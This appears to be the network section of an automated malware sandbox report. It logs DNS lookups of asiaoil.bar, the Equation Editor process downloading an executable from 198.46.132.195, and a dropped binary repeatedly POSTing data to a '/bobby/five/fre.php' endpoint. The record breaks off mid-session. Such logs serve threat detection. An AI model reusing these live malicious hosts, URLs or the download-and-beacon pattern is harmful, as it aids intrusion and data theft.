                    Feb 10, 2022 10:22:54.186261892 CET8.8.8.8192.168.2.220x412aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:55.202280998 CET8.8.8.8192.168.2.220x6266No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:55.202280998 CET8.8.8.8192.168.2.220x6266No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:56.214804888 CET8.8.8.8192.168.2.220xfd14No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:56.214804888 CET8.8.8.8192.168.2.220xfd14No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:57.333787918 CET8.8.8.8192.168.2.220x8b69No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:57.333787918 CET8.8.8.8192.168.2.220x8b69No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:58.417352915 CET8.8.8.8192.168.2.220xe59eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:58.417352915 CET8.8.8.8192.168.2.220xe59eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:59.519994974 CET8.8.8.8192.168.2.220x3e6No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:59.519994974 CET8.8.8.8192.168.2.220x3e6No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:00.533606052 CET8.8.8.8192.168.2.220x37b5No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:00.533606052 CET8.8.8.8192.168.2.220x37b5No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:01.595443010 CET8.8.8.8192.168.2.220x92dcNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:01.595443010 CET8.8.8.8192.168.2.220x92dcNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:02.604903936 CET8.8.8.8192.168.2.220xdcc3No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:02.604903936 CET8.8.8.8192.168.2.220xdcc3No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:03.649529934 CET8.8.8.8192.168.2.220x5c5aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:03.649529934 CET8.8.8.8192.168.2.220x5c5aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:04.640897036 CET8.8.8.8192.168.2.220x314dNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:04.640897036 CET8.8.8.8192.168.2.220x314dNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:05.934077978 CET8.8.8.8192.168.2.220x18fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:05.934077978 CET8.8.8.8192.168.2.220x18fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:08.573890924 CET8.8.8.8192.168.2.220xb372No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:08.573890924 CET8.8.8.8192.168.2.220xb372No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:09.647778988 CET8.8.8.8192.168.2.220x7447No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:09.647778988 CET8.8.8.8192.168.2.220x7447No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:10.689938068 CET8.8.8.8192.168.2.220xebcfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:10.689938068 CET8.8.8.8192.168.2.220xebcfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:11.726572037 CET8.8.8.8192.168.2.220x56b2No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:11.726572037 CET8.8.8.8192.168.2.220x56b2No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:12.805661917 CET8.8.8.8192.168.2.220x8d8dNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:12.805661917 CET8.8.8.8192.168.2.220x8d8dNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:13.894022942 CET8.8.8.8192.168.2.220xdd5aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:13.894022942 CET8.8.8.8192.168.2.220xdd5aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:14.907351017 CET8.8.8.8192.168.2.220xca3fNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:14.907351017 CET8.8.8.8192.168.2.220xca3fNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:16.148524046 CET8.8.8.8192.168.2.220xe624No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:16.148524046 CET8.8.8.8192.168.2.220xe624No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:17.401235104 CET8.8.8.8192.168.2.220xc2e1No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:17.401235104 CET8.8.8.8192.168.2.220xc2e1No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:18.763688087 CET8.8.8.8192.168.2.220xb066No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:18.763688087 CET8.8.8.8192.168.2.220xb066No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:19.818831921 CET8.8.8.8192.168.2.220x3e8aNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:19.818831921 CET8.8.8.8192.168.2.220x3e8aNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:20.950112104 CET8.8.8.8192.168.2.220x38cfNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:20.950112104 CET8.8.8.8192.168.2.220x38cfNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:22.051954985 CET8.8.8.8192.168.2.220x3dc9No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:22.051954985 CET8.8.8.8192.168.2.220x3dc9No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:23.115072966 CET8.8.8.8192.168.2.220x38abNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:23.115072966 CET8.8.8.8192.168.2.220x38abNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:25.172872066 CET8.8.8.8192.168.2.220xeadNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:25.172872066 CET8.8.8.8192.168.2.220xeadNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:26.735743999 CET8.8.8.8192.168.2.220xf593No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:26.735743999 CET8.8.8.8192.168.2.220xf593No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:27.781708956 CET8.8.8.8192.168.2.220x32eeNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:27.781708956 CET8.8.8.8192.168.2.220x32eeNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:28.778294086 CET8.8.8.8192.168.2.220x4a27No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:28.778294086 CET8.8.8.8192.168.2.220x4a27No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:29.769979954 CET8.8.8.8192.168.2.220x7d68No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:29.769979954 CET8.8.8.8192.168.2.220x7d68No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:30.778796911 CET8.8.8.8192.168.2.220x9f6eNo error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:30.778796911 CET8.8.8.8192.168.2.220x9f6eNo error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:31.820941925 CET8.8.8.8192.168.2.220x3040No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:31.820941925 CET8.8.8.8192.168.2.220x3040No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:32.840801001 CET8.8.8.8192.168.2.220xd8f9No error (0)asiaoil.bar172.67.197.66A (IP address)IN (0x0001)
                    Feb 10, 2022 10:23:32.840801001 CET8.8.8.8192.168.2.220xd8f9No error (0)asiaoil.bar104.21.49.244A (IP address)IN (0x0001)
                    • 198.46.132.195
                    • asiaoil.bar
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.22 | 49165 | 198.46.132.195 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:21:50.261872053 CET | 0 | OUT | GET /windowSSH/.win32.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 198.46.132.195
                    Connection: Keep-Alive
                    Feb 10, 2022 10:21:50.385209084 CET | 1 | IN | HTTP/1.1 200 OK
                    Date: Thu, 10 Feb 2022 09:21:50 GMT
                    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                    Last-Modified: Thu, 10 Feb 2022 03:31:37 GMT
                    ETag: "480d4-5d7a1966fd8a9"
                    Accept-Ranges: bytes
                    Content-Length: 295124
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.22 | 49166 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:21:59.753804922 CET | 312 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 176
                    Connection: close
                    Feb 10, 2022 10:21:59.836230040 CET | 313 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:21:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4453c8e679137-FRA
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    10 | 192.168.2.22 | 49175 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:11.483872890 CET | 328 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:11.594872952 CET | 329 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=thdM9Np%2FCdPYSURDbhixX%2FX8u4tEOLZU%2FvVuDbDE134sivqgwq%2BaJfoO5vJ0tXiBljYm%2FC%2F30qIj93fbRfKfXGvl%2BpAnC9Vf%2FlfUUZamRBGfzlQvLCoIxHh%2BgetLJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db44585da166940-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    11 | 192.168.2.22 | 49176 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:12.553925991 CET | 330 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:12.721690893 CET | 331 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BEFEhIgHNjdPe%2Fupr%2FEP7FioCKDN%2BQkotKPjVJOS%2Frml7qplaroEnTQz1FIinV2XsHaS%2FI7nUqbPdpg00nvPfbyrD1nl6xKScXbaQFyDSbzbSQdRqYsZkYL%2FaMhgSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4458c8c24904f-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    12 | 192.168.2.22 | 49177 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:13.627098083 CET | 332 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:13.718802929 CET | 333 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KXNvxjzVfF4hz0T9dBMVDpRewCBTbhWivG59MXcrMq3Fz0H3HqGx%2F5DX%2Bne%2B%2FFccTkhD5ws8ZgjI27n620j0vO0mLN2fs3T3gcOiTbX8ownTlbqimc3Co0pX0aSa4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445933dcd9247-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    13 | 192.168.2.22 | 49178 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp | kBytes transferred | Direction | Data
                    Feb 10, 2022 10:22:14.784465075 CET | 334 | OUT | POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:14.920140982 CET  335                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NVUp%2BcxarDGGCShA6A3fVGNJKlQzMKQTikn%2FmGyj3943bP7FxgEz5bihNVsOHsU3DbxzwdZ03uFPNgUbs9%2F0oEhIIT0nnSYYifUkfynsl2OJVPJCYFOqol8oHQboIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db4459a7c04694c-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    14          192.168.2.22  49179        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:15.879811049 CET  335                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:15.963191986 CET  336                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YywndWPDbt1nWWBUZyOXzJTtQd6vv4%2FE1Tker%2B341XUrk33CDyk4IMaSDz5n%2BK2atL0VK3i5tDkfDiWK6GJ%2F3hUlhDHcf%2Fn6Pch6y%2FzzAYpnP5BzB5pzhQW97EcSSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445a1484f90e0-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    15          192.168.2.22  49180        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:17.221999884 CET  337                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:17.311069012 CET  338                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UjFRYEW1vf5tlCFa1f1vwHKik1aRVbAIBpy1RMsjGKnLW4Qrm9vJ89Nrs6dLqDWMcgVmBrYxiuG%2FUeCxjisf7RsLjasp6QzHWLM4TEeZkFdIUloz%2B3B9BJnC3ZRzZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445a9aa3b9249-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    16          192.168.2.22  49181        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:18.584774971 CET  339                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:18.688278913 CET  340                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KHC3Edk5h9AYeBTw4zi6GBAjPXoz6AEM7UyHRy8hW3je7zgNBBmtdwVwGpiSZh81JKEYltIiJgER6JT21WX3XjM2N0XFbkBnufuzgMA76%2Bp7Xcs80ietpmWj4LHaRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445b23bfc8fec-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    17          192.168.2.22  49182        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:20.304832935 CET  341                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:20.398272991 CET  342                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QULp3ZlAMhwUjANw1YvL4%2BMJk9Z%2FbESFzhJWPA0iK5uawopHl0uiRldRAdRBGHJQS%2BTh9FZdQ4ZFWsS9QSIa12g5o6LPT8XtnzGfCgSERqmR9OTXY0oGiJOB7t3gug%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445bcfe999158-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    18          192.168.2.22  49183        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:21.371169090 CET  342                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:21.466526985 CET  343                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiD84uKNL21I2ykVJEfn%2Fe2gpHIc0bS1RI%2FxuxHXAll6ytxzAqIMdpyZN%2FG8qWdDRDaJWS8n4CpPnVVPzZ%2BUtnIhRTImE9cuCSP7f%2BgqcZKxN4KBiYwynSKxXPUruQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445c39a1192b3-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    19          192.168.2.22  49184        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:22.490195036 CET  344                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 149
                    Connection: close
                    Feb 10, 2022 10:22:22.588881016 CET  345                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IYa8QLbJBtkMewci%2Fy3c8YjBFq4dsPE33C%2B67GR4NBQNLJZRdPOw48%2FtcUb%2BG8a9XxJsc%2FLHxAkXJbNtsVOHlmNJ8KgW%2BxJlAyE6l%2FjEcOW2fEoq4xgfX4aQ5RZPHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 6db445ca9c095c5c-FRA
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                    2           192.168.2.22  49167        172.67.197.66   80                C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    Timestamp                            kBytes transferred  Direction  Data
                    Feb 10, 2022 10:22:02.840347052 CET  314                 OUT        POST //bobby/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: asiaoil.bar
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 579BFA72
                    Content-Length: 176
                    Connection: close
                    Feb 10, 2022 10:22:02.975469112 CET  315                 IN         HTTP/1.1 404 Not Found
                    Date: Thu, 10 Feb 2022 09:22:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Connection: close
                    Status: 404 Not Found
                    CF-Cache-Status: DYNAMIC
